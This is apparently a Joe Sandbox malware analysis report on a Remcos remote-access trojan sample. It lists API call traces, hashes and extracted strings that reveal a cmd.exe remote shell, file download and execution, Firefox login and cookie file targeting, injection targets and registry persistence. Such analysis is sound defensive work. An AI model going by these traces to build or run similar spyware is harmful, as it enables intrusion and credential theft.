                                                                                                                                                                • Part of subcall function 00448706: RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                                                                              • _free.LIBCMT ref: 0044EF21
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 614378929-0
                                                                                                                                                              • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                                                                                                              • Instruction ID: 91765bf56145836b352927287b0900a7be963fc320189fecf9c5ab0789588b10
                                                                                                                                                              • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                                                                                                              • Instruction Fuzzy Hash: 2D01DB771043056BF321CF66984595AFBD9FB8A370F65051EE59453280EB34A806C778
                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: 312c12ffde6a647d33f516a49ed2b80b9a93d0109b1a3352aa23be3e2c0072ab
                                                                                                                                                              • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                                                                                                                              • Opcode Fuzzy Hash: 312c12ffde6a647d33f516a49ed2b80b9a93d0109b1a3352aa23be3e2c0072ab
                                                                                                                                                              • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED
                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                                                                              • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                                                                              • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                                                                              • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                                                                              APIs
                                                                                                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Startup
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 724789610-0
                                                                                                                                                              • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                              • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                                                              • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                              • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: recv
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                              • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                              • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                                                              • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                              • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: send
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                              • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                              • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                                                              • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                              • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Deallocate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1075933841-0
                                                                                                                                                              • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                              • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                                                              • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                              • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              • Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                                              • Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
                                                                                                                                                              • Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                                              • Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16
                                                                                                                                                              APIs
                                                                                                                                                              • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                                                                • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,PFb,004742F8), ref: 0041B489
                                                                                                                                                                • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,PFb,004742F8), ref: 0041B4BB
                                                                                                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,PFb,004742F8), ref: 0041B50C
                                                                                                                                                                • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,PFb,004742F8), ref: 0041B561
                                                                                                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,PFb,004742F8), ref: 0041B568
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002F8,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(000002F8,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                                                                • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                                                                • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                                                              • API String ID: 2918587301-599666313
                                                                                                                                                              • Opcode ID: e2ca2e914e310b0858f70a0c95673a6b17c487129b8746ef293d64369a6d2320
                                                                                                                                                              • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                                                                              • Opcode Fuzzy Hash: e2ca2e914e310b0858f70a0c95673a6b17c487129b8746ef293d64369a6d2320
                                                                                                                                                              • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                                                                              APIs
                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                                                              • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                                                              • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                                                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                              • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                                                                              • API String ID: 3815868655-81343324
                                                                                                                                                              • Opcode ID: d750428f01d036d271b251ec8fd94350236a07052f6e69f1ab6544ab59714425
                                                                                                                                                              • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                                                                              • Opcode Fuzzy Hash: d750428f01d036d271b251ec8fd94350236a07052f6e69f1ab6544ab59714425
                                                                                                                                                              • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                              • String ID: 0DG$PFb$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                                              • API String ID: 65172268-2449653920
                                                                                                                                                              • Opcode ID: f37c5126c027c7c3e0fa34fe350a0c5b3513135de5084eb22c34a7d5917134fe
                                                                                                                                                              • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                                                                              • Opcode Fuzzy Hash: f37c5126c027c7c3e0fa34fe350a0c5b3513135de5084eb22c34a7d5917134fe
                                                                                                                                                              • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                              • API String ID: 1164774033-3681987949
                                                                                                                                                              • Opcode ID: 73d22b47f5c5b3aeef604c5c9d6d9dd8cc7f1ea843bbdcbe5a6f1d302209f387
                                                                                                                                                              • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                                                                              • Opcode Fuzzy Hash: 73d22b47f5c5b3aeef604c5c9d6d9dd8cc7f1ea843bbdcbe5a6f1d302209f387
                                                                                                                                                              • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                              • API String ID: 3527384056-432212279
                                                                                                                                                              • Opcode ID: 2f60c1552ef0b9164ff4f80ef7a6433e0a0068827ec5ce580e755d84d5db7e49
                                                                                                                                                              • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                                                                              • Opcode Fuzzy Hash: 2f60c1552ef0b9164ff4f80ef7a6433e0a0068827ec5ce580e755d84d5db7e49
                                                                                                                                                              • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$PFb$ieinstal.exe$ielowutil.exe
                                                                                                                                                              • API String ID: 726551946-558447423
                                                                                                                                                              • Opcode ID: 6265d7186e0de0a30c9918c1bfd1a64db60bd3c3b533d39b749380a52cbb14bd
                                                                                                                                                              • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                                                                              • Opcode Fuzzy Hash: 6265d7186e0de0a30c9918c1bfd1a64db60bd3c3b533d39b749380a52cbb14bd
                                                                                                                                                              • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                                                                              APIs
                                                                                                                                                              • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                                              • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
